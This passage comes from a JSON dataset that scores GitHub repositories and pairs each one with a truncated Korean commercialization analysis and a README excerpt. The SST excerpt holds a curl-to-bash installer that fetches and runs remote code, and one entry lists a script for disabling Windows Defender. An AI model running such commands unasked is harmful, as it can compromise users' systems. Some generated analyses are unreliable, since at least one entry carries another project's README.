[Browser](#Browser \"Browser\")\n  - [Tools](#Tools \"Tools\")\n  - [Monitoring](#Monitoring \"Monitoring\")\n  - [Weather](#Weather \"Weather\")\n  - [News](#News \"News\")\n  - [Information boards](#Information-boards \"Information boards\")\n  - [Map](#Map \"Map\")\n  - [Money](#Money \"Exchange rates and financial information\")\n  - [Documentation](#Documentation \"Manuals, cheat sheets and FAQs\")\n  ","composite_score":0.0858,"license_safety_tag":"safe"},{"name":"gradle/kotlin-dsl","github_url":"https://github.com/gradle/kotlin-dsl","stars":5,"language":"Kotlin","license":"NOASSERTION","abandonment_months":6,"description":"# Gradle Kotlin DSL 저장소 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 프로젝트를 관리하는 핵심 도구를 더 쉽고 간편하게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 도구 SaaS**: 클라우드 기반 프로젝트 빌드 관리 서비스로 개발팀이 어디서나 협업할 수 있게 지원\n2. **내부 업무 도구**: 대형 IT회사의 여러 팀","readme_excerpt":"Gradle Kotlin DSL Samples\n=========================\n\n> [!CAUTION]\n> This repository is now obsolete.\n\nUp-to-date Kotlin DSL Reference docs for Gradle can be found [here](https://docs.gradle.org/current/kotlin-dsl/index.html).","composite_score":0.0855,"license_safety_tag":"unknown"},{"name":"docker-library/php","github_url":"https://github.com/docker-library/php","stars":5,"language":"Dockerfile","license":"mit","abandonment_months":1,"description":"# docker-library/php 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 기본 재료(PHP)를 안전하고 쉽게 구성해주는 표준 설계도 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별로 독립된 PHP 환경을 자동으로 제공하는 웹 개발 플랫폼\n2. **내부 업무 도구**: 회사의 여러 팀이 동일한 PHP 환","readme_excerpt":"# https://github.com/docker-library/php\n\n## Maintained by: [the Docker Community](https://github.com/docker-library/php)\n\nThis is the Git repo of the [Docker \"Official Image\"](https://github.com/docker-library/official-images#what-are-official-images) for [`php`](https://hub.docker.com/_/php/) (not to be confused with any official `php` image provided by `php` upstream). See [the Docker Hub page](https://hub.docker.com/_/php/) for the full readme on how to use this Docker image and for information regarding contributing and issues.\n\nThe [full image description on Docker Hub](https://hub.docker.com/_/php/) is generated/maintained over in [the docker-library/docs repository](https://github.com/docker-library/docs), specifically in [the `php` directory](https://github.com/docker-library/docs/tree/master/php).\n\n## See a change merged here that doesn't show up on Docker Hub yet?\n\nFor more information about the full official images change lifecycle, see [the \"An image's source changed in Git","composite_score":0.0853,"license_safety_tag":"safe"},{"name":"Spiderjockey02/Discord-Bot","github_url":"https://github.com/Spiderjockey02/Discord-Bot","stars":8,"language":"JavaScript","license":"Apache-2.0","abandonment_months":4,"description":"# Discord-Bot 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 디스코드(채팅 앱) 위에서 자동화된 봇을 만들 수 있어서, 커뮤니티 관리와 반복 업무를 자동으로 처리할 수 있다는 점이 매력적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디스코드 서버 관리자들이 월 구독으로 이용하는 봇 자동화 플랫폼\n2. **내부 업무 도구**: 회","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <img src=\"https://avatars.githubusercontent.com/u/97468814?s=200&v=4\" alt=egglord />\n  <br>\n  Egglord\n  <br>\n</h1>\n\n<h3 align=center>A fully customizable bot built with <a href=https://github.com/discordjs/discord.js>discord.js</a></h3>\n\n\n<div align=center>\n\n [![Discord](https://img.shields.io/discord/658113349384667198.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/8g6zUQu)\n[![Lines of Code](https://sonarcloud.io/api/project_badges/measure?project=Spiderjockey02_Discord-Bot&metric=ncloc)](https://sonarcloud.io/dashboard?id=Spiderjockey02_Discord-Bot)\n[![CodeFactor](https://www.codefactor.io/repository/github/spiderjockey02/discord-bot/badge/master)](https://www.codefactor.io/repository/github/spiderjockey02/discord-bot/overview/master)\n![Website](https://img.shields.io/website?down_color=red&down_message=offline&up_color=green&up_message=online&url=https%3A%2F%2Fegglord.dev%2F)\n[![Crowdin](https://badges.crowdi","composite_score":0.0852,"license_safety_tag":"safe"},{"name":"SpartnerNL/Laravel-Excel","github_url":"https://github.com/SpartnerNL/Laravel-Excel","stars":7,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Laravel-Excel 상용화 분석\n\n## 왜 보물인가\n엑셀 파일을 자동으로 읽고 쓸 수 있는 도구라서, 회계 담당자부터 마케팅 팀까지 누구나 필요로 하는 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 급여 관리 플랫폼에서 직원 데이터를 엑셀로 일괄 업로드/다운로드 기능 제공\n2. **내부 업무 도구**: 중소기업 ER","readme_excerpt":"<br />\n<br />\n<p align=\"center\">\n  <!-- XMAS: https://user-images.githubusercontent.com/7728097/146406114-a5f5e13a-e2ee-47a2-9bf9-ad43cdbdf200.png-->\n<img width=\"589\" src=\"https://user-images.githubusercontent.com/7728097/143205384-af3c73a8-0253-45f3-b5ac-28a335dddb87.png\" alt=\"Laravel Excel logo\">\n</p>\n<br />\n\n\n<h3 align=\"center\">Supercharged Excel exports and imports</h3>\n\n  <p align=\"center\">\n  A simple, but elegant <a href=\"https://laravel.com\" target=\"_blank\">Laravel<a/> wrapper around <a href=\"https://phpspreadsheet.readthedocs.io/\" target=\"_blank\">PhpSpreadsheet</a>\nexports and imports.\n</p>\n\n<h4 align=\"center\">\n  <a href=\"https://docs.laravel-excel.com/3.1/exports/\">Quickstart</a>\n  <span> · </span>\n  <a href=\"https://docs.laravel-excel.com/3.1/getting-started/\">Documentation</a>\n  <span> · </span>\n  <a href=\"https://course.laravel-excel.com\">Video Course</a>\n  <span> · </span>\n  <a href=\"https://github.com/SpartnerNL/Laravel-Nova-Excel\">Nova</a>\n  <span> · </span>\n  <a href=\"h","composite_score":0.0851,"license_safety_tag":"safe"},{"name":"Maatwebsite/Laravel-Excel","github_url":"https://github.com/Maatwebsite/Laravel-Excel","stars":5,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Laravel-Excel 보물 분석\n\n## 왜 보물인가\n엑셀 파일을 손쉽게 만들고 읽을 수 있게 해주는 도구로, 업무 자동화가 필요한 모든 비즈니스에서 필수적으로 사용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회계/재무 관리 소프트웨어에서 고객이 자신의 데이터를 엑셀로 내보내거나 가져올 수 있는 기능 제공\n2. **내부 ","readme_excerpt":"<br />\n<br />\n<p align=\"center\">\n  <!-- XMAS: https://user-images.githubusercontent.com/7728097/146406114-a5f5e13a-e2ee-47a2-9bf9-ad43cdbdf200.png-->\n<img width=\"589\" src=\"https://user-images.githubusercontent.com/7728097/143205384-af3c73a8-0253-45f3-b5ac-28a335dddb87.png\" alt=\"Laravel Excel logo\">\n</p>\n<br />\n\n\n<h3 align=\"center\">Supercharged Excel exports and imports</h3>\n\n  <p align=\"center\">\n  A simple, but elegant <a href=\"https://laravel.com\" target=\"_blank\">Laravel<a/> wrapper around <a href=\"https://phpspreadsheet.readthedocs.io/\" target=\"_blank\">PhpSpreadsheet</a>\nexports and imports.\n</p>\n\n<h4 align=\"center\">\n  <a href=\"https://docs.laravel-excel.com/3.1/exports/\">Quickstart</a>\n  <span> · </span>\n  <a href=\"https://docs.laravel-excel.com/3.1/getting-started/\">Documentation</a>\n  <span> · </span>\n  <a href=\"https://course.laravel-excel.com\">Video Course</a>\n  <span> · </span>\n  <a href=\"https://github.com/SpartnerNL/Laravel-Nova-Excel\">Nova</a>\n  <span> · </span>\n  <a href=\"h","composite_score":0.0851,"license_safety_tag":"safe"},{"name":"dromara/forest","github_url":"https://github.com/dromara/forest","stars":5,"language":"Java","license":"MIT","abandonment_months":4,"description":"# Forest 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 만들 때 필요한 외부 시스템과의 연결 작업을 자동으로 처리해주는 도구로, 개발자의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n- **API 통합 플랫폼 SaaS**: 여러 온라인 서비스(배송사, 결제사, SNS)를 한 곳에서 연결하고 관리하는 유료 서비스\n- **기업용 자동화 도","readme_excerpt":"\n\n<p align=\"center\">\n<a href=\"https://forest.kim/\">\n    <img width=\"500\" src=\"site/media/forest_main_logo.svg\" alt=\"logo\">\n</a>\n</p>\n\n\n<p align=\"center\">\n<a href=\"https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html\">\n    <img src=\"https://img.shields.io/badge/JDK-1.8+-yellow\" alt=\"JDK\">\n</a>\n\n<a href=\"https://opensource.org/licenses/mit-license.php\">\n    <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"License\">\n</a>\n<a href=\"https://forest.kim/\">\n    <img src=\"https://img.shields.io/badge/document-1.x-e96.svg\" alt=\"Documentation\">\n</a>\n<a href=\"https://forest.kim/pages/author/\">\n    <img src=\"https://img.shields.io/badge/author-%E5%85%AC%E5%AD%90%E9%AA%8F-7af\" alt=\"Author\">\n</a>\n</p>\n\n<h1 align=\"center\">Forest - 声明式HTTP客户端框架</h1>\n\n项目介绍：\n-------------------------------------\n\nForest是一个高层的、极简的声明式HTTP调用API框架<br>\n相比于直接使用Httpclient您不再用写一大堆重复的代码了，而是像调用本地方法一样去发送HTTP请求\n\n\n#### 获得荣誉\n\n- **2021 年度 OSC 中国开源项目评选「最受欢迎项目」**\n- **2022 年度 OSC 中国开源项目评选「最火热中国开源项目社区」","composite_score":0.0849,"license_safety_tag":"safe"},{"name":"utatti/perfect-scrollbar","github_url":"https://github.com/utatti/perfect-scrollbar","stars":7,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# utatti/perfect-scrollbar 분석\n\n## 왜 보물인가\n웹사이트의 스크롤바(화면을 아래위로 움직이는 막대)를 예쁘고 부드럽게 만들어주는 도구로, 사용자 경험을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 대시보드나 프로젝트 관리 웹앱에서 사용자 만족도를 높이는 UI 개선\n2. **내부 업무 도구","readme_excerpt":"# TW Elements [<img src=\"https://tecdn.b-cdn.net/img/logo/te-transparent-noshadows.webp\" width=\"45\" align=\"right\" alt=\"tw-elements\">](https://tw-elements.com/)<a href=\"https://www.npmjs.com/package/tw-elements\"><img src=\"https://img.shields.io/npm/dt/tw-elements.svg\" alt=\"Total Downloads\"></a> <a href=\"https://github.com/mdbootstrap/TW-Elements/releases\"><img src=\"https://img.shields.io/npm/v/tw-elements.svg\" alt=\"Latest Release\"></a> <a href=\"https://twitter.com/intent/tweet/?text=Thanks+@TWElement+for+creating+an+amazing+collection+of+open+source+components+for+@tailwindcss%20https://tw-elements.com/&hashtags=tailwindCSS,bootstrap,webdesign,javascript,100DaysOfCode,DevCommunity\"><img src=\"https://img.shields.io/twitter/url/http/shields.io.svg?style=social&label=Let%20us%20know%20you%20were%20here%21&\"></a>\n\nTW Elements is a huge collection of free, interactive components for Tailwind CSS.\n\n <table>\n    <tbody>\n    <tr>\n      <td>\n          <a href=\"https://tw-elements.com/\" alt=\"TW E","composite_score":0.0847,"license_safety_tag":"safe"},{"name":"serverless-stack/serverless-stack","github_url":"https://github.com/serverless-stack/serverless-stack","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Serverless Stack 상용화 분석\n\n## 왜 보물인가\n복잡한 백엔드 서버 없이 웹 애플리케이션을 만들 수 있는 오픈소스 프레임워크로, 개발 비용과 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 스타트업이 빠르게 웹 기반 업무 관리 도구나 협업 플랫폼을 출시할 수 있습니다.\n- **내부 업무 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://sst.dev/\">\n    <img alt=\"SST\" src=\"https://raw.githubusercontent.com/sst/identity/main/variants/sst-full.svg\" width=\"300\" />\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://sst.dev/discord\"><img alt=\"Discord\" src=\"https://img.shields.io/discord/983865673656705025?style=flat-square&label=Discord\" /></a>\n  <a href=\"https://www.npmjs.com/package/sst\"><img alt=\"npm\" src=\"https://img.shields.io/npm/v/sst.svg?style=flat-square\" /></a>\n  <a href=\"https://github.com/anomalyco/sst/actions/workflows/build.yml\"><img alt=\"Build status\" src=\"https://img.shields.io/github/actions/workflow/status/anomalyco/sst/build.yml?style=flat-square&branch=dev\" /></a>\n</p>\n\n---\n\nBuild full-stack apps on your own infrastructure.\n\n## Installation\n\nIf you are using SST as a part of your Node project, we recommend installing it locally.\n\n```bash\nnpm install sst\n```\n\nIf you are not using Node, you can install the CLI globally.\n\n```bash\ncurl -fsSL https://sst.dev/install | bash","composite_score":0.0844,"license_safety_tag":"safe"},{"name":"redux-observable/redux-observable","github_url":"https://github.com/redux-observable/redux-observable","stars":13,"language":"TypeScript","license":"mit","abandonment_months":6,"description":"# Redux-Observable 저장소 분석\n\n## 왜 보물인가\n복잡한 웹 애플리케이션에서 여러 작업이 동시에 일어날 때 이를 질서 있게 관리해주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 협업 SaaS (예: 팀 프로젝트 관리 도구)**\n- 여러 사용자의 동시 작업 처리 및 동기화 필요\n- 사용자당 월 $10-30 요금 모델에 적용","readme_excerpt":"<img title=\"logo\" src=\"logo/logo-small.gif\" width=\"16.5%\">\n<img title=\"redux-observable\" src=\"logo/logo-text-small.png\" width=\"72%\">\n\n[![Discord](https://img.shields.io/discord/102860784329052160)](https://discord.gg/reactiflux)\n[![build status](https://img.shields.io/travis/redux-observable/redux-observable/main.svg)](https://travis-ci.org/redux-observable/redux-observable)\n[![npm version](https://img.shields.io/npm/v/redux-observable.svg)](https://www.npmjs.com/package/redux-observable)\n[![npm downloads](https://img.shields.io/npm/dm/redux-observable.svg)](https://www.npmjs.com/package/redux-observable)\n\n[RxJS](http://github.com/ReactiveX/RxJS)-based middleware for\n[Redux](http://github.com/reactjs/redux). Compose and cancel async actions to create side effects and more.\n\n[https://redux-observable.js.org](https://redux-observable.js.org)","composite_score":0.0844,"license_safety_tag":"safe"},{"name":"yuk7/wsllib-go","github_url":"https://github.com/yuk7/wsllib-go","stars":5,"language":"Go","license":"MIT","abandonment_months":4,"description":"# yuk7/wsllib-go 분석 보고서\n\n## 왜 보물인가\nWindows 운영체제에서만 작동하는 특수한 기능들을 다른 프로그래밍 언어에서도 쉽게 사용할 수 있게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Windows 서버를 관리하는 클라우드 관리 플랫폼에서 고객사의 Windows 설정을 원격으로 제어하는 기능 제공\n2","readme_excerpt":"# wsllib-go\nA WSL Library for Golang.\n\n## Usage\nGet this package\n```\ngo get github.com/yuk7/wsllib-go\n```\n\n## Example\n```go\npackage main\n\nimport \"github.com/yuk7/wsllib-go\"\n\nfunc main() {\n    wsllib.WslLaunchInteractive(\"DistroName\", \"\", true)\n}\n```\n\n## Notes\nWslLaunchInteractive is not used in this library as it causes problems in goroutine.\n\nInstead, a function is defined to connect stdin, stdout, stderr to WslLaunch.\n","composite_score":0.0844,"license_safety_tag":"safe"},{"name":"joshbuchea/HEAD","github_url":"https://github.com/joshbuchea/HEAD","stars":5,"language":"","license":"unknown","abandonment_months":1,"description":"# joshbuchea/HEAD 저장소 분석\n\n## 왜 보물인가\n정보가 부족하여 이 저장소의 구체적인 가치를 평가하기 어렵지만, 작은 규모(Star 5개)의 틈새 프로젝트일 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 팀 내부에서만 사용하는 작은 규모의 자동화 솔루션으로 활용\n2. **학습용 API**: 개발자 교육이나 데모","readme_excerpt":"# 🤯 HEAD\n\n> A simple guide to HTML `<head>` elements\n\n[![Contributors](https://img.shields.io/github/contributors/joshbuchea/head.svg?style=for-the-badge)](https://github.com/joshbuchea/HEAD/graphs/contributors)\n[![CC0](https://img.shields.io/badge/license-CC0-green.svg?style=for-the-badge)](https://creativecommons.org/publicdomain/zero/1.0/)\n[![Follow @joshbuchea on Mastodon](https://img.shields.io/badge/Follow_@joshbuchea-purple?logo=mastodon&logoColor=white&style=for-the-badge)](https://hachyderm.io/@joshbuchea)\n\n## Table of Contents\n\n- [Recommended Minimum](#recommended-minimum)\n- [Elements](#elements)\n- [Recommended Order](#recommended-order)\n- [Meta](#meta)\n- [Link](#link)\n- [Scripts](#scripts)\n- [Icons](#icons)\n- [Social](#social)\n  - [Open Graph](#open-graph)\n  - [Schema.org](#schemaorg)\n  - [Google JSON-LD Schema](#google-json-ld-schema)\n  - [Pinterest](#pinterest)\n  - [OEmbed](#oembed)\n  - [QQ/Wechat](#qqwechat)\n  - [Dublin Core](#dublin-core)\n  - [Fediverse](#fediverse)\n- [B","composite_score":0.0843,"license_safety_tag":"unknown"},{"name":"eclipse/vert.x","github_url":"https://github.com/eclipse/vert.x","stars":9,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"# Eclipse Vert.x 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 빠르고 안정적으로 만들어주는 세계적으로 인정받은 오픈소스 기술로, 대규모 트래픽 처리가 필요한 기업들의 핵심 기반시설입니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 데이터 처리 SaaS**: 수백만 사용자의 동시 접속을 안정적으로 처리하는 채팅, 알림, 대시보드 서비스\n2. *","readme_excerpt":"[![Build Status (5.x)](https://github.com/eclipse-vertx/vert.x/actions/workflows/ci-5.x.yml/badge.svg)](https://github.com/eclipse-vertx/vert.x/actions/workflows/ci-5.x.yml)\n[![Build Status (4.x)](https://github.com/eclipse-vertx/vert.x/actions/workflows/ci-4.x.yml/badge.svg)](https://github.com/eclipse-vertx/vert.x/actions/workflows/ci-4.x.yml)\n\n## Vert.x Core\n\nThis is the repository for Vert.x core.\n\nVert.x core contains fairly low-level functionality, including support for HTTP, TCP, file system access, and various other features. You can use this directly in your own applications, and it's used by many of the other components of Vert.x.\n\nFor more information on Vert.x and where Vert.x core fits into the big picture please see the [website](http://vertx.io).\n\n## Building Vert.x artifacts\n\n```\n> mvn package\n```\n\n## Running tests\n\nRuns the tests\n\n```\n> mvn test\n```\n\nTests can be run with specified HTTP port and/or HTTPS port.\n\n```\n> mvn test -Dvertx.httpPort=8888 -Dvertx.httpsPort=404","composite_score":0.0842,"license_safety_tag":"unknown"},{"name":"neurosnap/neovimcraft","github_url":"https://github.com/neurosnap/neovimcraft","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":4,"description":"# Neovimcraft 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 편집 도구를 더 강력하게 만들어주는 확장 프로그램 모음으로, 개발자 생산성 시장의 높은 지불 능력을 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 생산성 SaaS**\n월간 구독 모델로 프리미엄 플러그인, 클라우드 설정 동기화, AI 기반 코드 자동완성 ","readme_excerpt":"# [neovimcraft.com](https://neovimcraft.com)\n\nA site dedicated to finding the best neovim plugins.\n\n## Want to submit a plugin?\n\nSubmit the plugin to\n[awesome-neovim](https://github.com/rockerBOO/awesome-neovim). We scrape that\nrepo and is the primary data source for the plugin directory.\n\n## nvim.sh\n\nWant to query neovimcraft from the terminal?\n\n```bash\ncurl https://nvim.sh\n```\n\nhttps://github.com/neurosnap/nvim.sh\n\n## Developing\n\nneovimcraft is a static site.  We use `deno` for static site generation.\n\nYou need to add a couple environment variables related to using the github api:\n\n```bash\nexport GITHUB_ACCESS_TOKEN='xxx'\nexport GITHUB_USERNAME='my-user'\n```\n\nTo scrape and process all plugins, run:\n\n```bash\nmake scrape\n```\n\nTo build the static site, run:\n\n```bash\nmake build\n```\n","composite_score":0.084,"license_safety_tag":"safe"},{"name":"Moonvy/Figma-Net-OK","github_url":"https://github.com/Moonvy/Figma-Net-OK","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":4,"description":"# Moonvy/Figma-Net-OK 분석\n\n## 왜 보물인가\n디자인 도구(피그마)와 프로그래밍을 연결하는 중간다리 역할을 하는 프로젝트로, 디자이너와 개발자 간의 소통 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 디자인팀이 만든 결과물을 자동으로 코드로 변환해주는 온라인 도구 제공\n2. **내부","readme_excerpt":"# FigmaNetOK 2\n\n<p align=\"center\">\n  <img  height=\"100\" src=\"https://github.com/Moonvy/Figma-Net-OK/raw/master/logo2.png\">\n</p>\n\n让 Figma 网络速度访问速度更快的方法（尤其是在 🇨🇳 中国）\n\n- 不使用翻墙\n- 仅更改本地 Hosts 配置\n- **🔥 2.0 以上版可自动一键修改 Hosts 配置**\n\nFigma 有不同的服务器，通常你的系统会自动选择 Figma 的服务地址，有些时候因为运营商、Figma 服务状态、DNS 设置等等原因，自动选择的 Figma 服务地址可能不是最好的（有时候可能速度相差 10 倍），所以这个工具能帮你测试在你的环境下所有 Figma 服务地址的真实速度（不是 ping 而是真实连接速度），这样你就可以通过修改 Hosts 的办法指定一个最快的 Figma 服务地址\n\n<p align=\"center\">\n  <img  height=\"400\" src=\"https://github.com/Moonvy/Figma-Net-OK/raw/master/FigmaNetOK-CLI%E6%BC%94%E7%A4%BA2.gif\">\n</p>\n\n\n## 使用\n\n### 下载 (v2.3.0)\n\n- [发布页](https://github.com/Moonvy/Figma-Net-OK/releases)\n- [Windows](https://moonvy.lanzouy.com/i26BY0kja7cj)\n- [MacOS](https://moonvy.lanzouy.com/iEqmT0kja5oj)\n\n#### MacOS 下无法启动的问题\n\n- **授权设置**  \n  前往系统偏好设置 > 安全性与隐私 > 允许访问，如果仍然提示无法打开可再次打开允许访问授权\n\n#### Windows 下无 Hosts 写入权限的问题\n\n- **解决办法**  \n [使用手动修改 Hosts 的方式](https://baike.baidu.com/item/hosts/10474546)\n  \n \n\n\n### 使用步骤\n\n1. 解压并运行文件「**FigmaNetOK**」\n2. 测速中，等待","composite_score":0.0839,"license_safety_tag":"unknown"},{"name":"lewagon/setup","github_url":"https://github.com/lewagon/setup","stars":33,"language":"Ruby","license":"unknown","abandonment_months":1,"description":"# lewagon/setup 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우려는 초보자들이 자신의 컴퓨터를 학습 준비 상태로 만들어주는 자동화 도구로, 복잡한 초기 설정 과정을 간단하게 해결해줍니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 코딩 부트캠프(Le Wagon 같은)에서 학생들의 첫 수업 준비 시간을 50% 단축\n2. **회","readme_excerpt":"## In Chinese?\n\n如果你在参加中文课程，请打开<a href=\"README.cn.md\">中文设置指南</a>\n\n## ¿En Español?\n\nHaga clic en <a href=\"README.es.md\">este enlace</a> para acceder a la versión en español de la configuración.\n\n## Em Português?\n\nClique <a href=\"README.pt.md\">neste link</a> para acessar a versão em português da configuração.\n\n## En Français ?\n\nClique sur <a href=\"README.fr.md\">ce lien</a> pour accéder à la version française du setup.\n\n## In English\n\nSetup guides for [Le Wagon](https://www.lewagon.com) AI Software Development course. Please choose your operating system (OS):\n\n<table>\n  <tr>\n    <td>\n      <a href=\"macos.md\">\n        <img src=\"images/apple_logo.png\" alt=\"macOS\">\n      </a>\n    </td>\n    <td>\n      <a href=\"windows.md\">\n        <img src=\"images/windows_logo.png\" alt=\"Windows\">\n      </a>\n    </td>\n    <td>\n      <a href=\"ubuntu.md\">\n        <img src=\"images/linux_logo.png\" alt=\"Ubuntu\">\n      </a>\n    </td>\n  </tr>\n</table>\n","composite_score":0.0838,"license_safety_tag":"unknown"},{"name":"knownsec/404StarLink2.0-Galaxy","github_url":"https://github.com/knownsec/404StarLink2.0-Galaxy","stars":7,"language":"","license":"unknown","abandonment_months":3,"description":"# 404StarLink2.0-Galaxy 분석 보고서\n\n## 왜 보물인가\n보안 업계에서 이름난 knownsec이 만든 보안 위협 정보를 한 곳에 모아 검색할 수 있는 도구로, 기업의 보안 담당자들이 신속하게 위험을 파악하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 보안팀을 위한 웹 기반 위협 정보 검색 플랫폼 (월 구","readme_excerpt":"## 404星链计划 / 404 StarLink Project\n\n<div align=\"center\">\n<img src=\"Images/logo.png\" width=\"300\">\n</div>\n\n「404星链计划」是知道创宇 404 实验室于 2020 年 8 月开始的计划，主要目的是改善安全圈内工具庞杂、水平层次不齐、开源无人维护的多种问题，促进安全开源社区的发展；通过这种方式将不同安全领域研究人员与开源项目链接起来。\n\n星链计划将不断地收集优秀的安全开源项目，对收录的项目提供技术支持，持续跟踪和展示项目的更新和动态，并建立了星链计划社区，社区用户可以通过星链展示板块探索自己感兴趣的项目，同时还可以在社区内快速为开源作者反馈问题。以此方式帮助开源项目成长，促进安全社区发展。\n\n![Stargazers over time](https://starchart.cc/knownsec/404StarLink.svg)\n\n## 展示/Exhibition\n<!--auto_index_exhibition_begin_5ffbdd274903479a5d958dd90847b2de-->\n\n**1.项目动态**\n\n| 时间 | 项目名称 | 项目动态 |\n|----|-----------|--------------------------|\n|2026-03-11|[**AntiDebug_Breaker**](detail/AntiDebug_Breaker.md)|AntiDebug_Breaker加入星链计划|\n|2026-02-18|[**AntiDebug_Breaker**](detail/AntiDebug_Breaker.md)|更新 [v3.0.4](detail/AntiDebug_Breaker.md#最近更新) 版本|\n|2026-03-10|[**CyberStrikeAI**](detail/CyberStrikeAI.md)|更新 [v1.3.23](detail/CyberStrikeAI.md#最近更新) 版本|\n|2026-03-10|[**g3proxy**](detail/g3proxy.md)|更新 [v1.12.3](detail/g3proxy.md#最近更新) 版本|\n|2026-03-04|[**HaE","composite_score":0.0836,"license_safety_tag":"unknown"},{"name":"rust-analyzer/rust-analyzer","github_url":"https://github.com/rust-analyzer/rust-analyzer","stars":16,"language":"Rust","license":"apache-2.0","abandonment_months":0,"description":"# rust-analyzer 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 코드를 더 빠르고 정확하게 작성할 수 있도록 돕는 지능형 보조 도구로, 프로그래밍 교육부터 대규모 기업 개발까지 광범위하게 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 교육 플랫폼**: 학생들이 프로그래밍을 배울 때 문법 오류를 실시간으로 지적하고 자동 완","readme_excerpt":"<p align=\"center\">\n  <img\n    src=\"https://raw.githubusercontent.com/rust-lang/rust-analyzer/master/assets/logo-wide.svg\"\n    alt=\"rust-analyzer logo\">\n</p>\n\nrust-analyzer is a language server that provides IDE functionality for\nwriting Rust programs. You can use it with any editor that supports\nthe [Language Server\nProtocol](https://microsoft.github.io/language-server-protocol/) (VS\nCode, Vim, Emacs, Zed, etc).\n\nrust-analyzer features include go-to-definition, find-all-references,\nrefactorings and code completion. rust-analyzer also supports\nintegrated formatting (with rustfmt) and integrated diagnostics (with\nrustc and clippy).\n\nInternally, rust-analyzer is structured as a set of libraries for\nanalyzing Rust code. See\n[Architecture](https://rust-analyzer.github.io/book/contributing/architecture.html)\nin the manual.\n\n[![codecov](https://codecov.io/github/rust-lang/rust-analyzer/graph/badge.svg)](https://app.codecov.io/github/rust-lang/rust-analyzer/tree/master)\n\n## Quick Start\n\nhttps:","composite_score":0.0834,"license_safety_tag":"safe"},{"name":"AbhishekSinhaCoder/Collection-of-Useful-Scripts","github_url":"https://github.com/AbhishekSinhaCoder/Collection-of-Useful-Scripts","stars":26,"language":"Batchfile","license":"GPL-3.0","abandonment_months":4,"description":"# Collection-of-Useful-Scripts 상용화 분석\n\n## 왜 보물인가\n복잡한 작업을 자동으로 해주는 작은 프로그램들을 모아놓은 도구 모음으로, 반복적인 업무를 빠르게 처리하려는 모든 직장인에게 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 작업 자동화 플랫폼으로, 직원들이 자주 반복하는 파일 변환·정리·수집 작","readme_excerpt":"# Collection of Useful Scripts - Overview & Categorization\n\n## Overview\nThis repository is a diverse library of scripts for **System Administration**, **Network Auditing**, **Task Automation**, and **Programming Education**. It includes tools spanning multiple languages (Python, PowerShell, Bash, and Batch) designed for both Windows and Unix environments.\n\n## Project Details\n- **Languages**: Python (`.py`), PowerShell (`.ps1`), Batch (`.bat`), Bash (`.sh`).\n- **Primary Use Cases**: IT Administration, Security Auditing, Web Scraping, and Learning.\n\n## Categorized Tools\n\n### 1. System Administration & Windows Utilities\n- **Active Directory Audit.ps1**: Comprehensive script for auditing users and groups in AD.\n- **Gather lots of sys info.bat**: A thorough system information collector.\n- **Disable Windows Defender on Windows 10.bat**: A utility for bypassing or disabling Defender (likely for lab/testing environments).\n- **Remove all printers and unused drivers.bat**: Maintenance script for","composite_score":0.0832,"license_safety_tag":"restricted"},{"name":"amyhaber/cnki-downloader","github_url":"https://github.com/amyhaber/cnki-downloader","stars":5,"language":"","license":"unknown","abandonment_months":6,"description":"# cnki-downloader 분석 보고서\n\n## 왜 보물인가\n중국의 방대한 학술논문 데이터베이스(CNKI)에서 자동으로 논문을 다운로드받을 수 있는 도구로, 학위논문이나 학술자료 수집에 드는 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **학술 자료 수집 SaaS**: 대학원생과 연구자가 구독하는 논문 자동 수집 서비스로 월 구독료","readme_excerpt":"# 